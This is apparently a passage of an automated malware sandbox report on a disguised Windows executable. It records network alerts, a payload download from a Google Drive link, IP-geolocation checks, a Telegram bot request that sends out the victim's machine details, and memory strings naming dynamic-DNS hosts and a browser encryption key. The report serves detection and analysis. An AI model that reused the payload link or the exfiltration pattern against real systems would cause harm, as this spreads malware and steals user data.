Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49710 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49712 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49708 -> 142.250.80.46:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49714 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49715 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49719 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49717 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49716 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49718 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49713 -> 172.67.177.134:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49711 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036489000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 08:56:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000710C1000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000000.1371592231.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000000.858359986.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000000.1371592231.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20a
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000362ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBZr
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5958598913.0000000007750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/X
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=downloadtz
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://eicar.org/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363A7000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
